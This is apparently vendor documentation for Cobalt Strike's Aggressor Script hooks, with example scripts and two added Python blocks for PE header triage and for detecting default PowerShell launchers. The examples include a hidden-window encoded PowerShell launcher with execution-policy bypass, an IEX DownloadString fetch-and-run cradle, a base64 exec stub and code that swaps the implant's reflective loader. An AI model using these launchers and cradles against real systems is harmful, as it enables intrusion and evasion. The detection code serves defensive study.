Hooks

Hooks allow Aggressor Script to intercept and change Cobalt Strike behavior.

APPLET_SHELLCODE_FORMAT

Format shellcode before it's placed on the HTML page generated to serve the Signed or Smart Applet Attacks.

https://www.cobaltstrike.com/help-java-signed-applet-attack

Applet Kit

This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).

Example

set APPLET_SHELLCODE_FORMAT {
	return base64_encode($1);
}

BEACON_RDLL_GENERATE

Hook to allow users to replace the Cobalt Strike reflective loader in a beacon with a User Defined Reflective Loader. The reflective loader can be extracted from a compiled object file and plugged into the Beacon Payload DLL.

https://www.cobaltstrike.com/help-user-defined-reflective-loader

Arguments

$1 - Beacon payload file name
$2 - Beacon payload (dll binary)
$3 - Beacon architecture (x86/x64)

Returns

The Beacon executable payload updated with the User Defined reflective loader. Return $null to use the default Beacon executable payload.

Example

sub generate_my_dll {
	local('$handle $data $loader $temp_dll');

	# ---------------------------------------------------------------------
	# Load an Object File that contains a Reflective Loader.
	# The architecture ($3) is used in the path.
	# ---------------------------------------------------------------------
	# $handle = openf("/mystuff/Refloaders/bin/MyReflectiveLoader. $+ $3 $+ .o");
	$handle = openf("mystuff/Refloaders/bin/MyReflectiveLoader. $+ $3 $+ .o");

	$data   = readb($handle, -1);
	closef($handle);

	# warn("Object File Length: " . strlen($data));

	if (strlen($data) eq 0) {
		warn("Error loading reflective loader object file.");
		return $null;
	}

	# ---------------------------------------------------------------------
	# extract loader from BOF.
	# ---------------------------------------------------------------------
	$loader = extract_reflective_loader($data);

	# warn("Reflective Loader Length: " . strlen($loader));

	if (strlen($loader) eq 0) {
		warn("Error extracting reflective loader.");
		return $null;
	}

	# ---------------------------------------------------------------------
	# Replace Beacon's default reflective loader with '$loader'.
	# ---------------------------------------------------------------------
	$temp_dll = setup_reflective_loader($2, $loader);

	# ---------------------------------------------------------------------
	# TODO: Additional Customization of the PE...
	# 	- Use 'pedump' function to get information for the updated DLL.
	# 	- Use these convenience functions to perform transformations on the DLL:
	# 		pe_remove_rich_header
	# 		pe_insert_rich_header
	# 		pe_set_compile_time_with_long
	# 		pe_set_compile_time_with_string
	# 		pe_set_export_name
	# 		pe_update_checksum
	# 	- Use these basic functions to perform transformations on the DLL:
	# 		pe_mask
	# 		pe_mask_section
	# 		pe_mask_string
	# 		pe_patch_code
	# 		pe_set_string
	# 		pe_set_stringz
	# 		pe_set_long
	# 		pe_set_short
	# 		pe_set_value_at
	# 		pe_stomp
	# ---------------------------------------------------------------------

	# ---------------------------------------------------------------------
	# Give back the updated beacon DLL.
	# ---------------------------------------------------------------------
	return $temp_dll;
}

# ------------------------------------
# $1 = DLL file name
# $2 = DLL content
# $3 = arch
# ------------------------------------
set BEACON_RDLL_GENERATE {
	warn("Running 'BEACON_RDLL_GENERATE' for DLL " . $1 . " with architecture " . $3);
	return generate_my_dll($1, $2, $3);
}
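The TODO block above lists helpers such as pe_set_compile_time_with_long and pe_update_checksum, which rewrite header fields of the generated DLL. The following is an added example, not code from Cobalt Strike or the Arsenal kits: it is the analyst-side counterpart, Python that reads those same fields (machine, PE32/PE32+ magic, TimeDateStamp, CheckSum) from a PE image and checks whether the checksum field is consistent with the file and whether the compile time is plausible. The image it inspects is constructed inline (DOS stub, PE signature, COFF header and an empty PE32+ optional header, no sections) so the block runs offline; the checksum routine assumes the CheckSum field sits on a 4-byte boundary, which holds whenever e_lfanew is 4-byte aligned.

```python
import datetime
import struct

# Layout constants for the constructed header-only PE32+ image used as sample input.
_E_LFANEW = 0x40       # offset of the "PE\0\0" signature
_OPT_HDR_SIZE = 0xF0   # size of a PE32+ optional header


def build_sample_image(timestamp, checksum):
    """Constructed header-only PE32+ image (not loadable) with the given field values."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, _E_LFANEW)
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (DLL | EXECUTABLE | LAA)
    coff = struct.pack("<HHIIIHH", 0x8664, 0, timestamp, 0, 0, _OPT_HDR_SIZE, 0x2022)
    opt = bytearray(_OPT_HDR_SIZE)
    struct.pack_into("<H", opt, 0, 0x20B)       # Magic: PE32+
    struct.pack_into("<I", opt, 64, checksum)   # CheckSum is at +64 in both PE32 and PE32+
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


def _header_offsets(data):
    """Return (COFF header offset, optional header offset) after validating signatures."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    return coff, coff + 20


def header_fields(data):
    """Read the header fields a loader-customisation step is most likely to rewrite."""
    coff, opt = _header_offsets(data)
    machine, timestamp = struct.unpack_from("<H2xI", data, coff)   # skip NumberOfSections
    magic = struct.unpack_from("<H", data, opt)[0]
    checksum = struct.unpack_from("<I", data, opt + 64)[0]
    compiled = datetime.datetime.fromtimestamp(timestamp, datetime.timezone.utc)
    return {
        "machine": machine,
        "pe32plus": magic == 0x20B,
        "timestamp": timestamp,
        "compiled_utc": compiled.isoformat(),
        "checksum": checksum,
        "checksum_offset": opt + 64,
    }


def compute_checksum(data, checksum_offset):
    """Standard PE image checksum; the CheckSum field itself is skipped, so the
    result does not depend on whatever value is currently stored there."""
    total = 0
    for i in range(0, len(data), 4):
        if i == checksum_offset:
            continue
        total += struct.unpack("<I", data[i:i + 4].ljust(4, b"\0"))[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)   # end-around carry
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return ((total & 0xFFFF) + len(data)) & 0xFFFFFFFF


def checksum_matches(data):
    """True when the stored CheckSum agrees with the file contents."""
    f = header_fields(data)
    return f["checksum"] == compute_checksum(data, f["checksum_offset"])


def timestamp_is_plausible(data, now_epoch=None):
    """False for the two values an analyst flags first: a zeroed stamp or one in the future."""
    ts = header_fields(data)["timestamp"]
    if now_epoch is None:
        now_epoch = int(datetime.datetime.now(datetime.timezone.utc).timestamp())
    return ts != 0 and ts <= now_epoch


if __name__ == "__main__":
    sample = build_sample_image(0x5F000000, 0)   # checksum left at zero, as many tools do
    print(header_fields(sample))
    print("checksum consistent:", checksum_matches(sample))
    print("timestamp plausible:", timestamp_is_plausible(sample))
```

A zero CheckSum is common in legitimate binaries that are not drivers, so a mismatch is a triage cue rather than a verdict; a stamp that is zero, far in the past or in the future is the same kind of cue, and both are worth recording alongside the export name and rich header for a dropped DLL.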

BEACON_RDLL_GENERATE_LOCAL

The BEACON_RDLL_GENERATE_LOCAL hook is very similar to BEACON_RDLL_GENERATE with additional arguments.

See: BEACON_RDLL_GENERATE hook

Arguments

$1 - Beacon payload file name
$2 - Beacon payload (dll binary)
$3 - Beacon architecture (x86/x64)
$4 - Parent beacon ID
$5 - GetModuleHandleA pointer
$6 - GetProcAddress pointer

Example

# ------------------------------------
# $1 = DLL file name
# $2 = DLL content
# $3 = arch
# $4 = parent Beacon ID
# $5 = GetModuleHandleA pointer
# $6 = GetProcAddress pointer
# ------------------------------------
set BEACON_RDLL_GENERATE_LOCAL {
	warn("Running 'BEACON_RDLL_GENERATE_LOCAL' for DLL " . $1 . " with architecture " . $3 . " Beacon ID " . $4 . " GetModuleHandleA " . $5 . " GetProcAddress " . $6);
	return generate_my_dll($1, $2, $3);
}

Also See

&BEACON_RDLL_GENERATE

BEACON_SLEEP_MASK

Update a Beacon payload with a User Defined Sleep Mask.

Arguments

$1 - beacon type (default, smb, tcp)
$2 - arch

Sleep Mask Kit

This hook is demonstrated in the Sleep Mask Kit:

https://www.cobaltstrike.com/help-sleep-mask-kit

EXECUTABLE_ARTIFACT_GENERATOR

Control the EXE and DLL generation for Cobalt Strike.

Arguments

$1 - the artifact file (e.g., artifact32.exe)
$2 - shellcode to embed into an EXE or DLL

Artifact Kit

This hook is demonstrated in the Artifact Kit:

https://www.cobaltstrike.com/help-artifact-kit

HTMLAPP_EXE

Controls the content of the HTML Application User-driven (EXE Output) generated by Cobalt Strike.

Arguments

$1 - the EXE data
$2 - the name of the .exe

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Example

set HTMLAPP_EXE {
	local('$handle $data');
	$handle = openf(script_resource("template.exe.hta"));
	$data   = readb($handle, -1);
	closef($handle);

	$data   = strrep($data, '##EXE##', transform($1, "hex"));
	$data   = strrep($data, '##NAME##', $2);

	return $data;
}

HTMLAPP_POWERSHELL

Controls the content of the HTML Application User-driven (PowerShell Output) generated by Cobalt Strike.

Arguments

$1 - the PowerShell command to run

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Example

set HTMLAPP_POWERSHELL {
	local('$handle $data');
	$handle = openf(script_resource("template.psh.hta"));
	$data   = readb($handle, -1);
	closef($handle);
	
	# push our command into the script
	return strrep($data, "%%DATA%%", $1);
}

POWERSHELL_COMMAND

Change the form of the PowerShell command run by Cobalt Strike's automation. This affects jump psexec_psh, powershell, and [host] -> Access -> One-liner.

Arguments

$1 - the PowerShell command to run.
$2 - true|false the command is run on a remote target.

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Example

set POWERSHELL_COMMAND {
	local('$script');
	$script = transform($1, "powershell-base64");
	
	# remote command (e.g., jump psexec_psh)
	if ($2) {
		return "powershell -nop -w hidden -encodedcommand $script";
	}
	# local command
	else {
		return "powershell -nop -exec bypass -EncodedCommand $script";
	}
}

POWERSHELL_COMPRESS

A hook used by the Resource Kit to compress a PowerShell script. The default uses gzip and returns a script that inflates the compressed payload.

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Arguments

$1 - the script to compress

POWERSHELL_DOWNLOAD_CRADLE

Change the form of the PowerShell download cradle used in Cobalt Strike's post-ex automation. This includes jump winrm|winrm64, [host] -> Access -> One-liner, and powershell-import.

Arguments

$1 - the URL of the (localhost) resource to reach

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Example

set POWERSHELL_DOWNLOAD_CRADLE {
	return "IEX (New-Object Net.Webclient).DownloadString(' $+ $1 $+ ')";
}
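The two defaults above (the POWERSHELL_COMMAND launcher with -nop, an encoded command and either -w hidden or -exec bypass, and the IEX/DownloadString cradle from POWERSHELL_DOWNLOAD_CRADLE) are exactly the shapes a detection engineer keys on in process-creation telemetry. The following is an added example, not part of this page or of the Resource Kit: Python that tokenises a command line, decodes the -EncodedCommand argument the same way transform($1, "powershell-base64") encodes it (base64 over UTF-16LE), and reports which of the documented indicators are present. The sample command lines are constructed here; the cradle URL is a localhost placeholder, and the matches_default_launcher rule is this example's own definition of "looks like the default hook output".

```python
import base64
import re

# Patterns for the default forms documented on this page.
POWERSHELL_RE = re.compile(r"\bpowershell(?:\.exe)?\b", re.IGNORECASE)
NOPROFILE_RE = re.compile(r"-nop\b|-noprofile\b", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-(?:w|win|windowstyle)\s+hidden\b", re.IGNORECASE)
BYPASS_RE = re.compile(r"-exec(?:utionpolicy)?\s+bypass\b", re.IGNORECASE)
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
CRADLE_RE = re.compile(r"(?:\bIEX\b|Invoke-Expression).*?\.DownloadString\(",
                       re.IGNORECASE | re.DOTALL)


def powershell_base64(script):
    """Same encoding as transform($1, "powershell-base64"): base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob):
    """Reverse of powershell_base64; None when the blob is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_command_line(cmdline):
    """Return the indicator names found in one process command line, in a fixed order."""
    if not POWERSHELL_RE.search(cmdline):
        return []
    found = []
    if NOPROFILE_RE.search(cmdline):
        found.append("noprofile")
    if HIDDEN_RE.search(cmdline):
        found.append("hidden-window")
    if BYPASS_RE.search(cmdline):
        found.append("execution-policy-bypass")
    decoded = None
    m = ENCODED_RE.search(cmdline)
    if m:
        found.append("encoded-command")
        decoded = decode_encoded_command(m.group(1))
    # The cradle may be visible in the command line or hidden inside the encoded payload.
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    if CRADLE_RE.search(haystack):
        found.append("download-cradle")
    return found


def matches_default_launcher(cmdline):
    """True when the line has the default POWERSHELL_COMMAND shape: -nop plus an encoded
    command plus either -w hidden (remote form) or -exec bypass (local form)."""
    found = set(analyse_command_line(cmdline))
    return {"noprofile", "encoded-command"} <= found and bool(
        found & {"hidden-window", "execution-policy-bypass"})


# Constructed sample records, not real telemetry. The first two reproduce the forms the
# two hook examples emit; the cradle URL is a localhost placeholder.
CRADLE = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:8080/a')"
SAMPLE_COMMAND_LINES = [
    "powershell -nop -w hidden -encodedcommand " + powershell_base64(CRADLE),
    "powershell -nop -exec bypass -EncodedCommand " + powershell_base64(CRADLE),
    "powershell.exe -NoProfile -Command Get-Process",   # routine admin use
    "C:\\Windows\\System32\\cmd.exe /c dir",            # not PowerShell at all
]


def scan(lines):
    """Summarise a batch of command lines as (indicators, default-launcher match) pairs."""
    return [(analyse_command_line(cl), matches_default_launcher(cl)) for cl in lines]


if __name__ == "__main__":
    for cl, (found, hit) in zip(SAMPLE_COMMAND_LINES, scan(SAMPLE_COMMAND_LINES)):
        print("ALERT" if hit else "ok   ", found, cl[:60])
```

Because the hook exists precisely so operators can change this form, the value of the rule is in the decoded payload rather than the flag spelling: decoding the argument and re-running the cradle pattern over the plaintext catches variants that only reorder or rename switches, while a changed cradle template needs its own pattern.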

PSEXEC_SERVICE

Set the service name used by jump psexec|psexec64|psexec_psh and psexec.

Example

set PSEXEC_SERVICE {
	return "foobar";
}

PYTHON_COMPRESS

Compress a Python script generated by Cobalt Strike.

Arguments

$1 - the script to compress

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Example

set PYTHON_COMPRESS {
	return "import base64; exec base64.b64decode(\"" . base64_encode($1) . "\")";
}

RESOURCE_GENERATOR

Control the format of the VBS template used in Cobalt Strike.

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Arguments

$1 - the shellcode to inject and run

RESOURCE_GENERATOR_VBS


Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit


SIGNED_APPLET_MAINCLASS

Specify the MAIN class of the Java Signed Applet Attack.

https://www.cobaltstrike.com/help-java-signed-applet-attack

Applet Kit

This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).

Example

set SIGNED_APPLET_MAINCLASS {
	return "Java.class";
}

SIGNED_APPLET_RESOURCE

Specify a Java Applet file to use for the Java Signed Applet Attack.

https://www.cobaltstrike.com/help-java-signed-applet-attack

Applet Kit

This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).

Example

set SIGNED_APPLET_RESOURCE {
	return script_resource("dist/applet_signed.jar");
}

SMART_APPLET_MAINCLASS

Specify the MAIN class of the Java Smart Applet Attack.

https://www.cobaltstrike.com/help-java-smart-applet-attack

Applet Kit

This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).

Example

set SMART_APPLET_MAINCLASS {
	return "Java.class";
}

SMART_APPLET_RESOURCE

Specify a Java Applet file to use for the Java Smart Applet Attack.

https://www.cobaltstrike.com/help-java-smart-applet-attack

Applet Kit

This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).

Example

set SMART_APPLET_RESOURCE {
	return script_resource("dist/applet_rhino.jar");
}